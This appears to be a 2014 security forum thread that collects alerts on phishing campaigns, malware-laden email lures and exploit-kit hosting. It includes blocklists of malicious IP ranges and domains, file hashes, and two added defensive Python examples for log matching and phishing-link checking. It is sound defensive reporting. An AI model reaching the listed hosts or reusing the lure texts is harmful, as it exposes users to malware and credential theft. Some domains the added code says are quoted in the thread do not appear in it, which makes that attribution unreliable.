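The scan reads the central directory only, so a quarantined attachment can be judged without ever writing a member to disk; a gateway would quarantine on any finding rather than rely on the user reading the extension.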

AplusWebMaster
2014-03-14, 14:24
FYI...

Google Docs users Targeted - Phishing Scam
- http://www.symantec.com/connect/blogs/google-docs-users-targeted-sophisticated-phishing-scam
13 Mar 2014 - "We see -millions- of phishing messages every day, but recently, one stood out: a sophisticated scam targeting Google Docs and Google Drive users. The scam uses a simple subject of "Documents" and urges the recipient to view an important document on Google Docs by clicking on the included link. Of course, the link doesn't go to Google Docs, but it does go to Google, where a very convincing fake Google Docs login page is shown:
Google Docs phishing login page:
> http://www.symantec.com/connect/sites/default/files/users/user-2551621/phish_site_image.png
The -fake- page is actually hosted on Google's servers and is served over SSL, making the page even more convincing. The scammers have simply created a folder inside a Google Drive account, marked it as public, uploaded a file there, and then used Google Drive's preview feature to get a publicly-accessible URL to include in their messages. This login page will look familiar to many Google users, as it's used across Google's services. (The text below "One account. All of Google." mentions what service is being accessed, but this is a subtlety that many will not notice.) It's quite common to be prompted with a login page like this when accessing a Google Docs link, and many people may enter their credentials without a second thought. After pressing "Sign in", the user’s credentials are sent to a PHP script on a -compromised- web server. This page then redirects to a real Google Docs document, making the whole attack very convincing. Google accounts are a valuable target for phishers, as they can be used to access many services including Gmail and Google Play, which can be used to purchase Android applications and content..."
___

ABSA Global business - certificate update – fake PDF malware
- http://myonlinesecurity.co.uk/absa-global-business-customers-certificate-update-fake-pdf-malware/
Mar 14, 2014 - "ABSA Global business customers 'certificate update' is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers. ABSA Global is a South African Bank so I wouldn’t expect a high number of US or UK citizens to have accounts with them, so this should be a quite obvious scam, phishing, malware attack to the majority of users. After examination of the malware, although many Antiviruses detect it as a Zbot, It looks more like an Androm version, possibly dropped by Asprox botnet. Almost all of these have a password stealing component, with the aim of stealing your email or FTP ( web space) log in credentials. Many of them are also designed to specifically steal your facebook and other social network log in details.
Attention!
On March 14, 2014 server upgrade will take place. Due to this the system may be offline for approximately half an hour.
The changes will concern security, reliability and performance of mail service and the system as a whole.
For compatibility of your browsers and mail clients with upgraded server software you should run SSl certificates update procedure.
This procedure is quite simple. All you have to do is just to install new server certificate attached to the letter.
Thank you in advance for your attention to this matter and sorry for possible inconveniences.
System Administrator ABSA Global

cert p12 install instruction.zip (58kb) - Extracts to ABSA cert p12 install instruction.exe
Current Virus total detections: 11/50* ... another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/f50ead6088bacbb78c3b63188e91ec504916b22f19106110cd28cac22e265843/analysis/
___

Fake Facebook messages
- http://myonlinesecurity.co.uk/fake-facebook-messages/
Mar 14, 2014 - "... plagued by Fake Facebook messages saying ” somebody commented on your status” (1) or “You requested a new Facebook password” (2) ...
1) http://myonlinesecurity.co.uk/wp-content/uploads/2014/03/facebook-somebody-commented-on-your-status.png
2) http://myonlinesecurity.co.uk/wp-content/uploads/2014/03/facebook-You-requested-a-new-Facebook-password.png
Always -hover- over the links in these emails and you will see that they do -not- lead to Facebook. Do not click on the links, just delete the emails as soon as they arrive. There is always the very high possibility that one of the other botnets will use these to send you to a malicious site where your computer will be infected, rather than trying to scam you out of money by selling fake medicines that could kill you."
___

Banks to be hit with MS costs for running outdated ATMs
- http://www.reuters.com/article/2014/03/14/banks-atms-idUSL6N0M345C20140314
LONDON/NEW YORK, March 14, 2014 - "Banks around the world, consumed with meeting more stringent capital regulations, will miss a deadline to upgrade outdated software for automated teller machines (ATMs) and face additional costs to Microsoft to keep them secure. The U.S. software company first warned that it was planning to end support for Windows XP in 2007, but only one-third of the world's 2.2 million ATMs which use the system will have been upgraded to a new platform, such as Windows 7 by the April deadline, according to NCR, one of the biggest ATM makers. To ensure the machines are protected against viruses and hackers many banks have agreed deals with Microsoft to continue supporting their ATMs until they are upgraded, extra costs and negotiations that were avoidable but are now likely to be a distraction for bank executives... Britain's five biggest banks - Lloyds Banking Group , Royal Bank of Scotland, HSBC, Barclays and Santander UK - either have, or are in the process of negotiating, extended support contracts with Microsoft. The cost of extending support and upgrading to a new platform for each of Britain's main banks would be in the region of 50 to 60 million pounds ($100 million), according to Sridhar Athreya, London-based head of financial services advisory at technology firm SunGard Consulting, an estimate corroborated by a source at one of the banks. Athreya said banks have left it late to upgrade systems after being overwhelmed by new regulatory demands in the wake of the 2007-08 financial crisis... Windows XP currently supports around 95 percent of the world's ATMs... many of the banks operating them will still be running their ATMs with Windows XP for a while after the April 8 deadline..."
___

Bogus online casino themed campaigns intercepted in the wild
- http://www.webroot.com/blog/2014/03/14/spamvertised-bogus-online-casino-themed-emails-lead-w32casino/
Mar 14, 2014 - "... proliferation of social engineering driven, privacy-violating campaigns serving W32/Casino variants. Relying on affiliate based revenue sharing schemes and spamvertised campaigns as the primary distribution vectors, the rogue operators behind them continue tricking tens of thousands of gullible users into installing the malicious applications. We’ve recently intercepted a series of spamvertised campaigns distributing W32/Casino variants...
Sample screenshots of the landing pages for the rogue casinos:
1) https://www.webroot.com/blog/wp-content/uploads/2014/03/Online_Casino_Gambling_W32_Casino_Potentially_Unwanted_Applicationc_PUA.png
2) https://www.webroot.com/blog/wp-content/uploads/2014/03/Online_Casino_Gambling_W32_Casino_Potentially_Unwanted_Applicationc_PUA_01.png
3) https://www.webroot.com/blog/wp-content/uploads/2014/03/Online_Casino_Gambling_W32_Casino_Potentially_Unwanted_Applicationc_PUA_02.png
4) https://www.webroot.com/blog/wp-content/uploads/2014/03/Online_Casino_Gambling_W32_Casino_Potentially_Unwanted_Applicationc_PUA_03.png
5) https://www.webroot.com/blog/wp-content/uploads/2014/03/Online_Casino_Gambling_W32_Casino_Potentially_Unwanted_Applicationc_PUA_04.png
6) https://www.webroot.com/blog/wp-content/uploads/2014/03/Online_Casino_Gambling_W32_Casino_Potentially_Unwanted_Applicationc_PUA_05-1024x576.png
Spamvertised URLs:
hxxp ://bit. ly/1brCoxg
hxxp ://bit .ly/1bQRudq
hxxp ://bit .ly/1mLQr5I
hxxp ://bit .ly/MCOyaL
hxxp ://bit .ly/1ec3UMN
hxxp ://bit .ly/1hN6Vbd
hxxp ://bit .ly/1mQ3XFu
hxxp ://bit .ly/17DJ4pZ
hxxp ://bit .ly/1ec2JNa
hxxp ://bit .ly/1fBY6d5
W32.Casino PUA domains reconnaissance:
hxxp ://rubyfortune .com – 78.24.211.177
hxxp ://grandparkerpromo .com – 95.215.61.160
hxxp ://kingneptunescasino1 .com – 67.211.111.169
hxxp ://riverbelle1 .com – 193.169.206.233
hxxp ://europacasino .com – 87.252.217.13
hxxp ://vegaspartnerlounge .com – 66.212.242.136

Sample detection rates for the W32/Casino PUA:
MD5: b80db6ec0e6c968499ce01232fbfdc5c * ... W32/Casino.P.gen!Eldorado
MD5: a2a545adf4498e409f7971f326333333 ** ... Heuristic.BehavesLike.Win32.Suspicious-DTR.S
MD5: a2a545adf4498e409f7971f326333333 *** ... W32/Casino.P.gen!Eldorado
MD5: 1cd6db7edbbc07d1c68968f584c0ac82 **** ... W32/Casino.P.gen!Eldorado
... (More) Known to have been downloaded from the same IP (87.248.203.254) ..."
* https://www.virustotal.com/en/file/135caecdb6399309e682c50a6555b2399caddbc15d586eb3e6daaa46aa946290/analysis/1394642298/
** https://www.virustotal.com/en/file/48a6ca872752c457b4844cbcf11e0bab80f0fee84d37659c1a70c8025c32e503/analysis/1394642439/
*** https://www.virustotal.com/en/file/353a47127596e06e3424d7dcb81ae5eeed83e492b3c911b82a47b7899ee0ea88/analysis/1394643637/
**** https://www.virustotal.com/en/file/4cfa780d93d15d05b38544c4db3f2a9284b2dd29fd06675729775e3717032c42/analysis/1394643413/

:mad: :fear: :sad:

AplusWebMaster
2014-03-17, 13:19
FYI...

Something evil on 198.50.140.64/27
- http://blog.dynamoo.com/2014/03/something-evil-on-198501406427.html
17 Mar 2014 - "Thanks again to Frank Denis (@jedisct1) for this heads up* involving grubby web host OVH Canada and their black hat customer "r5x .org / Penziatki" hosting the Nuclear EK in 198.50.140.64/27. A full list of all the web sites I can find associated with this range can be found here**, but the simplest thing to do is block 198.50.140.64/27 completely (or if you are paranoid about security and don't mind some collateral damage block 198.27.0.0/16 and 198.50.0.0/16). Domains in use that I can identify are listed below. I recommend you block -all- of them. Domains listed as malicious by Google are in red, those listed as suspect by SURBL are in italics.
Recommended blocklist:
198.50.140.64/27
ingsat .eu
kingro .biz ..."
(More detail and domains listed at the dynamoo URL above.)
* https://twitter.com/jedisct1/status/445220289534631937

** http://pastebin.com/kkPRKu6v
___

Something evil on 192.95.6.196/30
- http://blog.dynamoo.com/2014/03/something-evil-on-19295619630.html
17 Mar 2014 - "Another useful tip by Frank Denis* on evil in the OVH Canada IP ranges, suballocated to their black hat customer "r5x .org / Penziatki", this time on 192.95.6.196/30. The following domains should be considered as dangerous and I would recommend blocking them as soon as possible:
shoalfault .ru
addrela .eu
backinl .org
A full list of the domains I can find in this /30 can be found here** [pastebin].
Given the extremely poor reputation of these OVH Canada ranges, I would suggest blocking the following network ranges if you have a security-sensitive environment and are prepared to put up with the collateral damage of blocking some legitimate sites:
198.27.0.0/16
198.50.0.0/16
198.95.0.0/16 "
* https://twitter.com/jedisct1/status/445690516433145856

** http://pastebin.com/RWG8uj00
___

Bank of America / Merrill Lynch - Completion of request for ACH CashPro – fake PDF malware
- http://myonlinesecurity.co.uk/bank-america-merrill-lynch-completion-request-ach-cashpro-fake-pdf-malware/
Mar 17, 2014 - "Bank of America Merrill Lynch Completion of request for ACH CashPro is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. Almost all of these have a password stealing component, with the aim of stealing your email or FTP ( web space) log in credentials. Many of them are also designed to specifically steal your facebook and other social network log in details...
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/03/Bank-of-America-Merrill-Lynch-Completion-of-request-for-ACH-CashPro.png
17 March 2014 securedoc.zip (12kb) Extracts to securedoc.exe
Current Virus total detections: 2/49* - MALWR Auto Analysis**
This Bank of America Merrill Lynch Completion of request for ACH CashPro is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
* https://www.virustotal.com/en/file/4ceb14accb1937ebdaab550823495618deebce69a33b23c849656ce71ceb9bf5/analysis/

** https://malwr.com/analysis/Njc2MjY3YzcyNTc0NDA5NThlYjdhODVhYTEyMzI4OTY/
___

Injection attack in progress 17/3/14
- http://blog.dynamoo.com/2014/03/injection-attack-in-progress-17314.html
17 Mar 2014 - "A couple of injection attacks seem to be in progress, I haven't quite got to the bottom of them yet.. but you might want to block the following domains:
fsv-hoopte-winsen .de
grupocbi .com
These are hosted on 82.165.77.21 and 72.47.228.162 respectively. The malware is resistant to automated tools and redirects improperly-formed attempts to analyse it to Bing [1] [2]. The malware is appended to hacked .js files on target sites... This sort of attack has been used to push -fake- software updates* in the past. Even though I can't quite get to the bottom of this at the moment, you can be pretty sure that this is Nothing Good and I would recommend blocking these domains."
1) http://urlquery.net/report.php?id=9933756

2) http://urlquery.net/report.php?id=9933677

* http://blog.dynamoo.com/2014/01/script-exploits-lead-to-adscend-media.html
___

Fake Personal message from Gmail Service – spam
- http://myonlinesecurity.co.uk/fake-personal-message-gmail-service-spam/
Mar 17, 2014 - "< your name> Personal message from Gmail Service is an alternative version of the Fake Facebook messages*. Just like the Facebook versions these either take you to a Women’s Health page trying to sell you fake drugs for slimming or other women’s problems. Other days they send you to one of the Canadian or Russian Pharmacy pages selling Viagra, valium or other illegal drugs.
Fake Personal message from Gmail Service
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/03/fake-gmail-message.png
Always -hover- over the links in these emails and you will see that they do -not- lead to Gmail. Do -not- click on the links, just delete the emails as soon as they arrive. There is always the very high possibility that one of the other -botnets- will use these to send you to a malicious site where your computer will be infected, rather than trying to scam you out of money by selling fake medicines..."
* http://myonlinesecurity.co.uk/fake-facebook-messages/
___

Fake Salesforce/Quickbooks invoice - malware
- http://blog.dynamoo.com/2014/03/salesforcecom-please-respond-overdue.html
Mar 17, 2014 - "This -fake- Salesforce spam comes with a malicious attachment... actually two malicious attachments..
Date: Mon, 17 Mar 2014 16:12:20 +0100 [11:12:20 EDT]
From: "support @ salesforce .com" [support @ salesforce .com]
Subject: Please respond - overdue payment
Priority: High Priority 2
Please find attached your invoices for the past months. Remit the payment by 01/9/2013 as outlines under our "Payment Terms" agreement.
Thank you for your business,
Sincerely,
Alvaro Rocha
This e-mail has been sent from an automated system...

Attached are two archive files quickbook_invoice_89853654.rar and quickbook_invoice_8988561346654.zip which in turn contain the same malicious executable quickbook_invoice.scr which has a VirusTotal detection rate of 8/49*. Automated analysis tools... don't give much of a clue as to what is going on..."
* https://www.virustotal.com/en-gb/file/cc44b6e1388610fe84794c064e9b73bedf3450bfa08ea328ecd08cec30001d12/analysis/1395087978/

:fear: :mad:
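Several posts in this thread end with a "Recommended blocklist" mixing CIDR ranges (the OVH Canada /16s and the r5x.org /30s) with bare domains (gobemall .com, shoalfault .ru and so on). Matching a proxy or DNS log against such a list needs two different tests: prefix containment for the IPs and suffix matching for the domains, so that a hostname under a listed domain is caught too. The block below is an added example, not code from this thread or from dynamoo.com; the ranges and domains are the ones quoted above, while the log lines and their field layout (timestamp, client, destination, request) are constructed for the example.

```python
import ipaddress

# Ranges and domains as quoted in the dynamoo posts in this thread.
BLOCKED_RANGES = [ipaddress.ip_network(c) for c in (
    "198.27.0.0/16", "198.50.0.0/16", "198.95.0.0/16",   # OVH Canada, whole ranges
    "192.95.6.196/30", "64.120.242.160/27",              # smaller ranges named in the posts
)]
BLOCKED_DOMAINS = {
    "gobemall.com", "gobehost.info", "terenceteo.com", "quarkspark.org",
    "shoalfault.ru", "addrela.eu", "backinl.org",
}


def ip_blocked(ip):
    """Return the first listed range containing ip, or None."""
    addr = ipaddress.ip_address(ip)
    return next((str(net) for net in BLOCKED_RANGES if addr in net), None)


def domain_blocked(host):
    """Return the listed domain that host equals or sits under, or None.

    'cdn.gobemall.com' matches 'gobemall.com'; 'notgobemall.com' does not,
    because matching is done on whole labels, not on string suffixes.
    """
    labels = host.lower().rstrip(".").split(".")
    for i in range(len(labels) - 1):
        candidate = ".".join(labels[i:])
        if candidate in BLOCKED_DOMAINS:
            return candidate
    return None


def check_proxy_log(lines):
    """Return (line number, destination, reason) for every line whose destination is listed.

    Assumed line layout: '<timestamp> <client> <destination> <rest...>'.
    """
    hits = []
    for n, line in enumerate(lines, 1):
        fields = line.split()
        if len(fields) < 3:
            continue
        dest = fields[2]
        try:
            ipaddress.ip_address(dest)
            kind, match = "ip", ip_blocked(dest)
        except ValueError:
            kind, match = "domain", domain_blocked(dest)
        if match:
            hits.append((n, dest, f"{kind} matches {match}"))
    return hits


# Constructed sample log; only the destinations are taken from the posts above.
SAMPLE_LOG = [
    "2014-03-17T12:00:01 10.0.0.5 198.50.140.70 GET /index.php",
    "2014-03-17T12:00:02 10.0.0.7 www.example.com GET /",
    "2014-03-17T12:00:03 10.0.0.5 cdn.gobemall.com GET /a.js",
    "2014-03-17T12:00:04 10.0.0.9 8.8.8.8 DNS",
    "2014-03-17T12:00:05 10.0.0.5 192.95.6.197 GET /x",
]

if __name__ == "__main__":
    for n, dest, reason in check_proxy_log(SAMPLE_LOG):
        print(f"line {n}: {dest} ({reason})")
```

Note the cost the posts themselves flag: the /16 entries are broad enough to hit legitimate OVH customers, so a hit on one of them is a reason to look, while a hit on a /30 or a listed domain is a much stronger signal.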

AplusWebMaster
2014-03-18, 15:18
FYI...

AMEX phish...
- http://myonlinesecurity.co.uk/american-express-phishing-attempts/
Mar 18, 2014 - "We are seeing quite a few American Express -phishing- attempts trying to get your American Express details. These are very well crafted and look identical to genuine American Express emails. The senders appear to be from American Express until you look carefully at the email headers. They are using literally hundreds if not thousands of -hijacked- websites to perform these attacks. The site listed in the email is the first step in the chain and you are bounced on to other sites. The coding on the primary hijacked sites suggests that they are under the control of the Blackhole and Angler exploit kit criminals. This means that at any time when they have stolen enough identities and money, they will switch to spreading malware via the same network and emails. Do not click any links in these emails. Hover your mouse over the links and you will see a web address that isn’t American Express. Immediately -delete- the email and the safest way to make sure that it isn’t a genuine email from American Express is to type the American Express web address in your browser, and then log in to the account that way. There are currently 2 main avenues of the American Express phishing attempts:
AmericanExpress phishing attempts:
1) http://myonlinesecurity.co.uk/wp-content/uploads/2014/03/American-Express-Irregular-card-activity-phishing-email.png
2) http://myonlinesecurity.co.uk/wp-content/uploads/2014/03/American-Express-Important-Personal-Security-Key-phishing-email.png
Following the link in these takes you to a website that looks exactly like the real American Express site. You are then taken through loads of steps to input a lot of private and personal information. Not only will this information enable them to clear out & use your American Express account, but also your Bank Account, Email details, webspace (if you have it). They then want enough information to completely impersonate you and your identity not only in cyberspace but in real life..."
___

Gov't Biz Dept. – fake PDF malware
- http://myonlinesecurity.co.uk/government-business-departament-fake-pdf-malware/
Mar 18, 2014 - "Government Business Departament pretending to come (from a) Department for Business Innovation & Skills <business_dep@ gov .uk> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers. Please note the poor -spelling- in the email subject, which should be enough of a flag to warn users of the -fake- . Almost all of these have a password stealing component, with the aim of stealing your email or FTP ( web space) log in credentials. Many of them are also designed to specifically steal your facebook and other social network log in details.
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/03/Government-Business-Departament.png
... another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
___

Fake YouTube email – fake mov malware
- http://myonlinesecurity.co.uk/received-youtube-video-fake-mov-malware/
Mar 18, 2014 - "'You have received a YouTube video' is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers. Almost all of these have a password stealing component, with the aim of stealing your email or FTP ( web space) log in credentials. Many of them are also designed to specifically steal your facebook and other social network log in details... plain simple email with subject You have received a YouTube video and content just says 'Sent from my iPad'...
18 March 2014 : VIDEO_819562694.MOV.ZIP (79kb) : Extracts to VIDEO_890589685.MOV.exe
Current Virus total detections: 6/50*
... another one of the spoofed icon files... will look like a proper mov ( movie) file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/50516df13d5974a31c1499ea3d37f3bc17ab84ab808d91a44cc80e8666b769ae/analysis/

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/959ff3eff26773774443079d5d9d150f/tumblr_inline_n2mznrfywx1r6pupn.png
___

500,000 PCs attacked after 25,000 UNIX servers hijacked ...
- http://www.welivesecurity.com/2014/03/18/attack-unix-operation-windigo/
Mar 18, 2014 - "... Researchers at ESET, in collaboration with CERT-Bund, the European Organization for Nuclear Research (CERN), the Swedish National Infrastructure for Computing and other agencies, have uncovered a widespread cybercriminal operation that has seized control of tens of thousands of Unix servers. And if your system is found to be infected, experts strongly recommend you re-install the operating system, and consider all credentials used to log into the machine as compromised. In short, if you are a victim, all passwords and private OpenSSH keys should be changed. The attack, which has been given the name “Windigo” after a mythical creature from Algonquian Native American folklore, has resulted in over 25,000 Unix servers being hacked, resulting in 35 million spam messages being sent each day from compromised machines...
> http://www.welivesecurity.com/wp-content/uploads/2014/03/windigo-spam.jpeg
... That would be bad enough, normally. But in this case, malicious hackers have also been using hijacked web servers to infect visiting Windows PCs with click fraud and spam-sending malware, and display dating website adverts to Mac users. Even smartphone users don’t escape – finding their iPhones redirected to X-rated content, with the intention of making money for the cybercriminals...
> http://www.welivesecurity.com/wp-content/uploads/2014/03/windigo-iphone.jpeg
ESET’s security research team has published a detailed technical paper* into “Operation Windigo”, and says it believes that the cybercrime campaign has been gathering strength, largely unnoticed by the security community, for over two and a half years..."
An analysis of the visiting computers revealed a wide range of operating systems being used:
> http://www.welivesecurity.com/wp-content/uploads/2014/03/victims-by-os.jpeg
(More detail at the welivesecurity URL at the top.)
* http://www.welivesecurity.com/wp-content/uploads/2014/03/operation_windigo.pdf

Indicators of Compromise
- https://github.com/eset/malware-ioc

:mad: :fear:
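The AMEX, Facebook and Gmail items above all give the same manual check: hover over the link and compare the real target with the brand the mail claims to be from. The same comparison can be done mechanically on an HTML mail body before it reaches the user. The following is an added example, not code from this thread or from the sites it quotes: it collects every anchor, resolves the href host to its two-label suffix, and flags any anchor that points outside the claimed brand domain, noting separately when the visible text impersonates that brand. The brand domain americanexpress.com is assumed for the example, the hijacked host hijacked-site.example and the mail body are constructed, and the two-label suffix rule is a deliberate simplification (a production filter would use the Public Suffix List).

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class AnchorCollector(HTMLParser):
    """Collect (href, visible text) pairs from an HTML mail body."""

    def __init__(self):
        super().__init__()
        self.anchors = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.anchors.append((self._href, "".join(self._text).strip()))
            self._href = None


def registrable(host):
    """Crude registrable domain: last two labels (assumption; use the Public Suffix List in production)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def suspicious_links(html, brand_domain):
    """Return (href, text, reason) for each anchor whose host is outside brand_domain.

    Anchors without a host (relative links, mailto:) are not judged here.
    """
    parser = AnchorCollector()
    parser.feed(html)
    brand = brand_domain.lower()
    flagged = []
    for href, text in parser.anchors:
        host = urlparse(href).hostname or ""
        if not host:
            continue
        if registrable(host) != brand:
            reason = f"href host {host} is outside {brand}"
            if brand in text.lower():
                reason += "; visible text impersonates the brand"
            flagged.append((href, text, reason))
    return flagged


# Constructed mail body in the style of the lures described above; no real phishing content.
SAMPLE_EMAIL = """
<p>Irregular card activity detected. Please review your account.</p>
<a href="http://hijacked-site.example/update/">https://www.americanexpress.com/account</a>
<p>Questions? <a href="https://www.americanexpress.com/help">Help</a>
or <a href="mailto:someone@hijacked-site.example">write to us</a>.</p>
"""

if __name__ == "__main__":
    for href, text, reason in suspicious_links(SAMPLE_EMAIL, "americanexpress.com"):
        print(f"{href}\n  shown as: {text!r}\n  {reason}")
```

The second, legitimate link is left alone because its host resolves to the brand domain; only the anchor whose displayed text and real target disagree is reported, which is exactly what a hover reveals.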

AplusWebMaster
2014-03-19, 14:35
FYI...

More OVH Canada hosted exploit kits
- http://blog.dynamoo.com/2014/03/more-ovh-canada-hosted-exploit-kits.html
19 Mar 2014 - "... Yesterday Frank identified three new OVH Canada ranges* being used to host the Nuclear EK [1], again the customer is "r5x .org / Penziatki"
198.50.212.116/30
198.50.131.220/30
192.95.40.240/30
Update: also 192.95.51.164/30 according to this Tweet**... A full list of everything I can find is here*** [pastebin] ... At a minimum I recommend that you block those IP ranges and/or domains.
Given the extremely poor reputation of these OVH Canada ranges, I would suggest blocking the following network ranges if you have a security-sensitive environment and are prepared to put up with the collateral damage of blocking some legitimate sites:
198.27.0.0/16
198.50.0.0/16
198.95.0.0/16 "
(More detail at the dynamoo URL above.)

* https://twitter.com/jedisct1/status/445970337490927616

** https://twitter.com/jedisct1/status/446154856093343744

*** http://pastebin.com/4eGWBwHV

[1] http://krebsonsecurity.com/tag/nuclear-exploit-pack/

Updated - Mar 20, 2014: http://blog.dynamoo.com/search/label/OVH
___

Something evil on 64.120.242.160/27
- http://blog.dynamoo.com/2014/03/something-evil-on-6412024216027.html
19 Mar 2014 - "64.120.242.160/27 (Network Operations Center, US) is hosting a number of exploit domains (see this example report at VirusTotal*). There appears to be a variety of badness involved, and many of the domains hosted in the range are flagged as malicious by Google or SURBL (report here** [csv]). There appears to be nothing legitimate in this whole range. Domains flagged as malicious by Google are highlighted, ones marked as malicious by SURBL are in italics. I would recommend you block the entire lot.
64.120.242.160/27
asifctuenefcioroxa .net
hukelmshiesuy .net
asifctuenefcioroxa .com
asifctuenefcioroxa .info ..."
(Long list at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/ip-address/64.120.242.180/information/

** http://www.dynamoo.com/files/64.120.242.160-27.csv
___

Fake NatWest SPAM ...
- http://blog.dynamoo.com/2014/03/natwest-you-have-received-secure.html
19 Mar 2014 - "This -fake- NatWest spam has a malicious attachment:
Date: Wed, 19 Mar 2014 15:14:02 +0100 [10:14:02 EDT]
From: NatWest [secure.message@ natwest .co .uk]
Subject: You have received a secure message
You have received a secure message
Read your secure message by opening the attachment, SecureMessage.zip. You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the NatWest Bank Secure Email Help Desk at 0131 556 4226.
First time users - will need to register after opening the attachment...

Attached to the message is an archive file SecureMessage.zip which in turn contains a malicious executable SecureMessage.scr which has a VirusTotal detection rate of 8/51*. Automated analysis tools... show attempted downloads from the following domains, both hosted on servers that appear to be completely compromised and should be blocked.
199.193.115.111 (NOC4Hosts, US) ...
184.107.149.74 (iWeb, Canada) ...
50.116.4.71 (Linode, US) ...
Recommended blocklist:
199.193.115.111
184.107.149.74
50.116.4.71 ..."
(More detail at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/file/bcae5b59eef951338360e461038920511bb16e667f3a7595c42fe86ca9035c9c/analysis/1395245960/

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/e8680fb74314899d9ece73bd8ebca5f2/tumblr_inline_n2p5d8Mol61r6pupn.png
___

Steer Clear of the Latest Twitter Spamrun
- http://blog.malwarebytes.org/social-engineering/2014/03/steer-clear-of-the-latest-twitter-spamrun/
Mar 19, 2014 - "Watch out for messages on your Twitter feed like the ones below, because they’ll try their best to give your account a bad hair day:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/03/twitphish1.jpg
Some of the (many) messages read as follows, and all are designed to entice the recipient into clicking:
lmao I had a eerie feeling this was yours
haha this post by you is so funny
haha this was made by you?
Im laughing so much right now at this
haha this update by you is odd
lol I had a eerie feeling this was you
lolz this post by you is nuts
lol this was posted by you?
omfg this entry by you is crazy
lolz this tweet by you is so funny
LOL you got 2 see this, its epic
omfg this post by you is cool
lolz this post by you is hilarious... (more)
There are others, but those seem to be the main ones and everything else is typically a variation on the above themes. The links take end-users to a site informing them of the following:
“Your current session has ended
For security purposes you were forcibly signed out. For security purposes you need to verify your Twitter account, please login”
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/03/twitpsh2.jpg
... change your password if you think you’ve already been affected by this one and clear up any rogue links lying around on your feed – your followers will thank you for it.
Christopher Boyd (Hat-tip to @Cliffsull *)"
* https://twitter.com/cliffsull

:mad::mad:

AplusWebMaster
2014-03-20, 17:04
FYI...

Something evil on 66.96.195.32/27
- http://blog.dynamoo.com/2014/03/something-evil-on-66961953227.html
Mar 20, 2014 - "Another bad bunch of IPs hosted by Network Operations Center in Scranton following on from yesterday*, this time 66.96.195.32/27 which seems to be more of the same thing. The exploit kit in question is the Goon EK, as shown in this URLquery report**. It seems that it spreads by malicious SWF files being injected into legitimate websites (I think this one, for example [3]). The easiest thing to do would be to block traffic to 66.96.195.32/27, but I can see... malicious websites active in that range (all on 66.96.195.49 [4])..."
* http://blog.dynamoo.com/2014/03/something-evil-on-6412024216027.html

** http://urlquery.net/report.php?id=1395311494976

3] http://urlquery.net/report.php?id=1395322515680

4] https://www.virustotal.com/en/ip-address/66.96.195.49/information/
___

PHP bug allowing site hijacking still menaces Internet 22 months on
- http://arstechnica.com/security/2014/03/php-bug-allowing-site-hijacking-still-menaces-internet-22-months-on/
Mar 19 2014 - "A vulnerability that allows attackers to take control of websites running older versions of the PHP scripting language continues to threaten the Internet almost two years after security researchers first warned that attackers could use it to remotely execute malicious code on vulnerable servers. As Ars reported 22 months ago, the code-execution exploits worked against PHP sites only when they ran in common gateway interface mode, a condition that applied by default to those running the Apache Web server. According to a blog post published Tuesday*, CVE-2012-1823**, as the vulnerability is formally indexed, remains under attack today by automated scripts that scour the Internet in search of sites that are susceptible to the attack. The sighting of in-the-wild exploits even after the availability of security patches underscores the reluctance of many sites to upgrade... PHP versions prior to 5.3.12 and 5.4.2 are vulnerable. The Imperva blog post* said that an estimated 16 percent of public websites are running a vulnerable version. People running susceptible versions should upgrade right away. Readers who visit vulnerable sites should notify the operators of the risk their site poses..."
* http://blog.imperva.com/2014/03/threat-advisory-php-cgi-at-your-command.html
Mar 18, 2014

** https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1823 - 7.5 (HIGH)
Last revised: 07/20/2013
___

Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Product Shipping Documents Email Messages - 2014 Mar 20
Fake Financial Documents Email Messages - 2014 Mar 20
Email Messages with Malicious Attachments - 2014 Mar 20
Fake Tax Return Notification Email Messages - 2014 Mar 20
Email Messages with Malicious Attachments - 2014 Mar 20
Fake Document Processing Request Email Messages - 2014 Mar 20
Fake Fax Message Delivery Email Messages - 2014 Mar 20
Fake Product Order Quotation Email Messages - 2014 Mar 20
Fake Tax Document Email Messages - 2014 Mar 20
